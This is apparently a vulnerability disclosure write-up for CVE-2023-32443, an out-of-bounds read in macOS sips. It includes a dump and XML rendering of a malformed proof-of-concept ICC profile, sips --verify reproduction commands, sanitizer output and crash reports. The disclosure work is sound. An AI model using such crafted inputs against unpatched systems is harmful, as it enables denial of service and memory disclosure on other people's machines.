Executive Summary
CVE-2023-32443 | sips – scriptable image processing system. Processing a file may lead to a denial-of-service or potentially disclose memory contents. An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura, Monterey and Big Sur.
CVE-2023-32443
Processing a file may lead to a denial-of-service or potentially disclose memory contents
https://support.apple.com/en-us/HT213843
NIST CVSS 3.1 Severity and Metrics: 8.1 High [NIST]
Prior Art
CVE-2022-26730 | ColorSync
TL;DR
CVE-2022-26730 | ColorSync | Found via PoC Replay of P0-2226 and disassembly of Patch for CVE-2021-30942
CVSS 3.1 Base Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE-2023-32443 | sips
ICC color profiles follow the format specified by the International Color Consortium (ICC).
Application Targets
- (1) sips, ColorSync, Safari, Finder, Instruments and other applications that use ICC profiles, or graphics files with embedded ICC profiles, on macOS 11, 12 & 13.
- (2) Apple Developer Instruments included memory bugs that were fixed in macOS 13.
- (3) sips is reachable from the Internet (based on fingerprinting), like other image or document processing tools.
- Result of Feedback Reports: 21E258 | 13E113 | Instruments | Crash | .icc | ColorSync | PoC | OE089308559899 | FB9970176 | FB9970191 | FB9971897
CVE-2023-32443 | sips | ICC Sample Profile
Graphical View of a PoC ICC Color Profile for CVE-2023-32443 | sips showing the curveParameters using ColorSync:

sips ICC Profile Dump
./iccDumpProfile cve-2023-32443-variant-003.icc
Profile: 'cve-2023-32443-variant-003.icc'
Profile ID: Profile ID not calculated.
Size: 665236(0xa2694) bytes
Header
------
Attributes: Reflective | Glossy
Cmm: 0x4141 'Hoyt' = 486F7974
Creation Date: 6/5/2023 22:53:30
Creator: 'Hoyt' = 486F7974
Data Color Space: CmykData
Flags EmbeddedProfileFalse | UseWithEmbeddedDataOnly
PCS Color Space: LabData
Platform: Unknown 'Hoyt' = 486F7974
Rendering Intent: Perceptual
Profile Class: OutputClass
Profile SubClass: Not Defined
Version: 2.10
Illuminant: X=0.9642, Y=1.0000, Z=0.8249
Spectral PCS: NoSpectralData
Spectral PCS Range: Not Defined
BiSpectral Range: Not Defined
MCS Color Space: Not Defined
Profile Tags
------------
Tag ID Offset Size
---- ------ ------ ----
profileDescriptionTag 'desc' 300 249
copyrightTag 'cprt' 552 10338
mediaWhitePointTag 'wtpt' 10892 20
AToB0Tag 'A2B0' 10912 89958
AToB1Tag 'A2B1' 100872 89958
BToA0Tag 'B2A0' 190832 145588
BToA1Tag 'B2A1' 336420 145588
BToA2Tag 'B2A2' 482008 145588
gamutTag 'gamt' 627596 37009
deviceModelDescTag 'dmdd' 664608 249
deviceMfgDescTag 'dmnd' 664860 249
AToB2Tag 'A2B2' 10912 89958
Unknown 'dscm' = 6473636D 'dscm' 665112 78
chromaticAdaptationTag 'chad' 665192 44
Tag ('o.ic' = 6F2E6963) not found in profile
P0-2225 Profile in XML
<?xml version="1.0" encoding="UTF-8"?>
<IccProfile>
<Header>
<PreferredCMMType>appl</PreferredCMMType>
<ProfileVersion>2.20</ProfileVersion>
<ProfileDeviceClass>scnr</ProfileDeviceClass>
<DataColourSpace>RGB </DataColourSpace>
<PCS>Lab </PCS>
<CreationDateTime>2003-07-151T38807:38807:38807</CreationDateTime>
<PrimaryPlatform>97979797h</PrimaryPlatform>
<ProfileFlags EmbeddedInFile="true" UseWithEmbeddedDataOnly="true" VendorFlags="97979794"/>
<DeviceManufacturer>97979797h</DeviceManufacturer>
<DeviceModel>97979797h</DeviceModel>
<DeviceAttributes ReflectiveOrTransparency="transparency" GlossyOrMatte="matte" MediaPolarity="negative" MediaColour="colour" VendorSpecific="000000000000000I64x"/>
<RenderingIntent>Perceptual</RenderingIntent>
<PCSIlluminant>
<XYZNumber X="-26728.40820312" Y="1.00000000" Z="0.82490540"/>
</PCSIlluminant>
<ProfileCreator>appl</ProfileCreator>
</Header>
<Tags>
<profileDescriptionTag> <PrivateType type="B2A2">
<UnknownData>
000000cc0000012c6d4241200000002000040000000000fc0000000000000000
0000006000000020706172610000000000000000000100007061726100000000
0000000000010000706172610000000000000000000100007061726100000000
00000000000100001111
</UnknownData>
</PrivateType> </profileDescriptionTag>
<PrivateTag TagSignature="dscm"> <PrivateType type="00010000h">
<UnknownData>
7061726100000000000000000001000070617261000000000000000000010000
111111000000000000000000000000000200000000008ad0000000000000902f
00000000000095540000
</UnknownData>
</PrivateType> </PrivateTag>
<mediaWhitePointTag> <PrivateType type="00009A3Ah">
<UnknownData>
0000000000009eda000000000000a331
</UnknownData>
</PrivateType> </mediaWhitePointTag>
<chromaticAdaptationTag> <PrivateType type="">
<UnknownData>
0000a73a000000000000aaee000000000000ae4b000000000000b14c158b0000
0000b3ef33590000
</UnknownData>
</PrivateType> </chromaticAdaptationTag>
<AToB0Tag> <lutBtoAType>
<Channels InputChannels="0" OutputChannels="4"/>
<BCurves>
</BCurves>
<CLUT>
<GridPoints></GridPoints>
<TableData>
0 35536 0 0
</TableData>
</CLUT>
<ACurves>
<ParametricCurve FunctionType="0">
1.00000000
</ParametricCurve>
<ParametricCurve FunctionType="0">
1.00000000
</ParametricCurve>
<ParametricCurve FunctionType="0">
1.00000000
</ParametricCurve>
<ParametricCurve FunctionType="0">
1.00000000
</ParametricCurve>
</ACurves>
</lutBtoAType> </AToB0Tag>
</Tags>
</IccProfile>
Out of Bounds Read
The memory contents at this seeded buffer address are repetitive: prior to fuzzing, the same value (0x61006100) is repeated many times. This value is the UTF-16 encoding of the character “a” twice:
(lldb) x/500
0x1c5c881cc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881dc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881ec: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881fc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8820c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8821c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8822c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8823c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8824c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8825c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8826c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8827c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8828c: 0x61006100 0x61006100
When the contents of an application response match the UTF-16 encoding of the character “a” twice during fuzzing, the sips application has performed an out-of-bounds read.
CVE-2023-32443 | sips | SEGV on unknown address
DYLD_INSERT_LIBRARIES=/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/14.0.0/lib/darwin/libclang_rt.ubsan_osx_dynamic.dylib sips --verify cve-2022-26730-variant-2.icc
/Users/xss/Documents/new-icc/cve-2022-26730-variant-2.icc
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==19828==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fecd280fc50 (pc 0x00010bddabe1 bp 0x7ff7b413c020 sp 0x7ff7b413bf90 T681671)
==19828==The signal is caused by a READ memory access.
#0 0x10bddabe1 (sips:x86_64+0x100018be1)
#1 0x10bdd9947 (sips:x86_64+0x100017947)
#2 0x10bdd17e3 (sips:x86_64+0x10000f7e3)
#3 0x10bdc556c (sips:x86_64+0x10000356c)
#4 0x7ff80623e30f (<unknown module>)
==19828==Register values:
rax = 0x0000000000000001 rbx = 0x0000000063757276 rcx = 0x000000000000002c rdx = 0x0000000000000000
rdi = 0x0000000000000020 rsi = 0x00007fecd280fc50 rbp = 0x00007ff7b413c020 rsp = 0x00007ff7b413bf90
r8 = 0x00000000fffffff4 r9 = 0x0000000000000000 r10 = 0x0000000000000800 r11 = 0x000000010bddb0b8
r12 = 0x0000000000000000 r13 = 0x0000000000000000 r14 = 0x0000000000000698 r15 = 0x0000000000000000
UndefinedBehaviorSanitizer can not provide additional info.
SUMMARY: UndefinedBehaviorSanitizer: SEGV (sips:x86_64+0x100018be1)
==19828==ABORTING
CVE-2023-32443 | sips | PoC Crash Analysis
Thread 0 crashed while executing code in the main dispatch queue (com.apple.main-thread) of the application “sips”. The call stack of the crashed thread is shown in the crash report below.
The crashing instruction is mov ebx, DWORD PTR [rsi], which loads a 4-byte value from the memory location pointed to by the rsi register into the ebx register. The crash occurred because the address held in rsi (0x000000020248a970) was not mapped, causing a segmentation fault.
CVE-2023-32443 | Sips | PoC
sips --verify cve-2022-26730-variant-3.icc
ThreadSanitizer:DEADLYSIGNAL
==19913==ERROR: ThreadSanitizer: BUS on unknown address (pc 0x00010073ebe1 bp 0x7ff7bf7d8020 sp 0x7ff7bf7d7f90 T686590)
==19913==The signal is caused by a READ memory access.
==19913==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used.
#0 <null> <null>:2 (sips:x86_64+0x100018be1)
#1 <null> <null>:2 (sips:x86_64+0x100017947)
#2 <null> <null>:2 (sips:x86_64+0x10000f7e3)
#3 <null> <null>:2 (sips:x86_64+0x10000356c)
#4 <null> <null> (0x7ff80623e30f)
==19913==Register values:
rax = 0x0000000000000001 rbx = 0x0000000063757276 rcx = 0x000000000000002c rdx = 0x0000000000000000
rdi = 0x0000000000000020 rsi = 0x00007b6d00001c50 rbp = 0x00007ff7bf7d8020 rsp = 0x00007ff7bf7d7f90
r8 = 0x00000000fffffff4 r9 = 0x0000000000000000 r10 = 0x0000000000000800 r11 = 0x000000010073f0b8
r12 = 0x0000000000000000 r13 = 0x0000000000000000 r14 = 0x0000000000000698 r15 = 0x0000000000000000
PoC Crash Report
Date/Time: 2023-03-15 10:00:32.3296 -0400
OS Version: macOS 13.2.1 (22D68)
Report Version: 12
Bridge OS Version: 7.2 (20P3045)
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000020248a970
Exception Codes: 0x0000000000000001, 0x000000020248a970
Termination Reason: Namespace SIGNAL, Code 11 Segmentation fault: 11
Terminating Process: exc handler [12552]
VM Region Info: 0x20248a970 is not in any region. Bytes after previous region: 4294855025 Bytes before following region: 105544488015504
REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL
MALLOC_SMALL 1024a1000-1024a6000 [ 20K] rw-/rwx SM=PRV
---> GAP OF 0x5ffefdb5a000 BYTES
MALLOC_NANO 600000000000-600008000000 [128.0M] rw-/rwx SM=PRV
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 sips 0x101c40be1 0x101c28000 + 101345
1 sips 0x101c3f948 0x101c28000 + 96584
2 sips 0x101c377e4 0x101c28000 + 63460
3 sips 0x101c2b56d 0x101c28000 + 13677
4 dyld 0x7ff80623e310 start + 2432
Thread 0 crashed with X86 Thread State (64-bit):
rax: 0x0000000000000001 rbx: 0x0000000063757276 rcx: 0x000000000000002c rdx: 0x0000000000000000
rdi: 0x0000000000000020 rsi: 0x000000020248a970 rbp: 0x00007ff7be2d6060 rsp: 0x00007ff7be2d5fd0
r8: 0x00000000fffffff4 r9: 0x0000000000000000 r10: 0x0000000000000800 r11: 0x0000000101c410b8
r12: 0x0000000000000000 r13: 0x0000000000000000 r14: 0x0000000000000698 r15: 0x0000000000000000
rip: 0x0000000101c40be1 rfl: 0x0000000000010283 cr2: 0x000000020248a970
Logical CPU: 8
Error Code: 0x00000004 (no mapping for user data read)
Trap Number: 14
Thread 0 instruction stream:
f7 76 0c 41 81 cd 00 04-00 00 e9 36 01 00 00 48 .v.A.......6...H
8b 45 88 8b 00 3d 6d 42-41 20 74 1c 3d 6d 41 42 .E...=mBA t.=mAB
20 0f 85 1e 01 00 00 3b-7d a4 48 8b 85 78 ff ff ......;}.H..x..
ff 48 0f 44 45 90 eb 0f-3b 7d a4 48 8b 45 90 48 .H.DE...;}.H.E.H
0f 44 85 78 ff ff ff 0f-b6 00 85 c0 0f 84 f3 00 .D.x............
00 00 89 fe 48 03 75 88-8d 4f 0c 44 39 f1 77 a3 ....H.u..O.D9.w.
[8b]1e 44 8b 7e 04 0f cb-8b 4e 08 81 fb 61 72 61 ..D.~....N...ara <==
70 74 47 81 fb 76 72 75-63 0f 85 bf 00 00 00 0f ptG..vruc.......
c9 44 8d 04 09 41 83 c0-0f 41 83 e0 fc 45 85 ff .D...A...A...E..
74 0d c7 46 04 00 00 00-00 45 09 d5 45 09 d4 44 t..F.....E..E..D
01 c7 44 39 f7 0f 87 58-ff ff ff 44 89 c1 48 01 ..D9...X...D..H.
ce ff c8 75 a3 e9 8b 00-00 00 41 89 c9 66 41 c1 ...u......A..fA.
Binary Images:
0x101c28000 - 0x101c47fff sips (*) <60994dd9-97cd-3b78-9263-343f4ba5e6af> /usr/bin/sips
0x7ff806238000 - 0x7ff8062cccaf dyld (*) <bba77709-6cad-3592-ab03-09d0f7b8610e> /usr/lib/dyld
0x0 - 0xffffffffffffffff ??? (*) <00000000-0000-0000-0000-000000000000> ???
Timeline
- Keywords: CVE-2023-32443 | sips | ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC
- Operating System: macOS 13
- Vendor Notification: March 2023
- Vendor Resolution: July 2023
- Vendor Fix: This issue was addressed with improved input validation by Apple
- Vendor Source: https://support.apple.com/en-us/HT213843
- Published: 7/24/2023
- Bug Type == New but Recycled from ColorSync CVE-2022-26730
Knowledgebase
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32443
https://bugs.chromium.org/p/project-zero/issues/detail?id=2226
https://nvd.nist.gov/vuln/detail/CVE-2022-26730
https://nvd.nist.gov/vuln/detail/CVE-2023-32443